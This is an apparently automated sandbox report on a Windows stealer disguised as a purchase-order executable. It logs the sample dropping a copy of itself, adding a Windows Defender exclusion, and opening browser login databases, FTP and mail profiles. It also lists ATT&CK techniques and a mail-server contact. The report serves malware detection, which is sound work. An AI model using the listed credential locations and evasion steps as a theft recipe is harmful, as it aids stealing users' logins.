                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (7 identical entries)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (2 identical entries)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (3 identical entries)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (2 identical entries)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation (6 identical entries)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Queries volume information: C:\Users\user\AppData\Roaming\jDCErdK.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\jDCErdK.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\purchase order - PO-011024-201.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match | File source: 9.2.jDCErdK.exe.3da9108.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.jDCErdK.exe.3de3b28.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.purchase order - PO-011024-201.exe.40782a8.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.jDCErdK.exe.3de3b28.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.purchase order - PO-011024-201.exe.40782a8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.jDCErdK.exe.3da9108.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000D.00000002.4107833892.000000000284C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000002.1781239060.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000002.1781239060.0000000002F0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000002.1779040921.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000002.4107833892.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.1786573650.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1695549066.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: purchase order - PO-011024-201.exe PID: 7644, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 8136, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: jDCErdK.exe PID: 7392, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7988, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions (2 identical entries)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini (2 identical entries)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini (2 identical entries)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara match | File source: 9.2.jDCErdK.exe.3da9108.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.jDCErdK.exe.3de3b28.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.purchase order - PO-011024-201.exe.40782a8.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.jDCErdK.exe.3de3b28.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.purchase order - PO-011024-201.exe.40782a8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.jDCErdK.exe.3da9108.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000008.00000002.1781239060.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000002.1779040921.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000002.4107833892.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.1786573650.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1695549066.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: purchase order - PO-011024-201.exe PID: 7644, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 8136, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: jDCErdK.exe PID: 7392, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7988, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match | File source: 9.2.jDCErdK.exe.3da9108.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.jDCErdK.exe.3de3b28.2.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.purchase order - PO-011024-201.exe.40782a8.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.jDCErdK.exe.3de3b28.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.purchase order - PO-011024-201.exe.40b2cc8.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.purchase order - PO-011024-201.exe.40782a8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.jDCErdK.exe.3da9108.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000D.00000002.4107833892.000000000284C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000002.1781239060.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000002.1781239060.0000000002F0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000002.1779040921.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000D.00000002.4107833892.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.1786573650.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1695549066.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: purchase order - PO-011024-201.exe PID: 7644, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 8136, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: jDCErdK.exe PID: 7392, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 7988, type: MEMORYSTR
                    MITRE ATT&CK matrix, rebuilt per tactic from the flattened table. Numbers in brackets are the report's signature-count badges, concatenated exactly as extracted; entries without a number are the matrix's unmatched cells.

                    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances
                    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains
                    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools
                    Execution: Windows Management Instrumentation [121]; Command and Scripting Interpreter [2]; Scheduled Task/Job [1]; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript
                    Persistence: DLL Side-Loading [1]; Windows Service [1]; Scheduled Task/Job [1]; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
                    Privilege Escalation: DLL Side-Loading [1]; Windows Service [1]; Process Injection [11]; Scheduled Task/Job [1]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd
                    Defense Evasion: Disable or Modify Tools [11]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; Software Packing [11]; Timestomp [1]; DLL Side-Loading [1]; File Deletion [1]; Masquerading [11]; Modify Registry [1]; Virtualization/Sandbox Evasion [141]; Process Injection [11]
                    Credential Access: OS Credential Dumping [2]; Input Capture [21]; Credentials in Registry [1]; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture
                    Discovery: File and Directory Discovery [2]; System Information Discovery [24]; Security Software Discovery [211]; Process Discovery [1]; Virtualization/Sandbox Evasion [141]; Application Window Discovery [1]; System Network Configuration Discovery [1]; System Owner/User Discovery; Network Sniffing; Network Service Discovery; System Network Connections Discovery
                    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools
                    Collection: Archive Collected Data [11]; Data from Local System [2]; Email Collection [1]; Input Capture [21]; Clipboard Data [1]; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging
                    Command and Control: Ingress Tool Transfer [1]; Encrypted Channel [11]; Non-Application Layer Protocol [2]; Application Layer Protocol [23]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols
                    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol
                    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption
                    Behavior Graph ID: 1465995, Sample: purchase order - PO-011024-..., Startdate: 02/07/2024, Architecture: WINDOWS, Score: 100. Process tree rebuilt from the extracted graph text; node numbers and the numbers in parentheses are the graph's own labels.

                    Start node: DNS/IP mail.iaa-airferight.com (47), api.ipify.org (49)
                    Start node signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 16 other signatures

                    8  purchase order - PO-011024-201.exe (7), started
                         dropped: C:\Users\user\AppData\Roaming\jDCErdK.exe, PE32
                         dropped: C:\Users\user\...\jDCErdK.exe:Zone.Identifier, ASCII
                         dropped: C:\Users\user\AppData\Local\...\tmpA55D.tmp, XML
                         dropped: C:\...\purchase order - PO-011024-201.exe.log, ASCII
                         signature: Adds a directory exclusion to Windows Defender
                         14  RegSvcs.exe (15 2), started
                               network: mail.iaa-airferight.com 46.175.148.58, port 25, AS LAGIDKOM-NET (UA), Ukraine
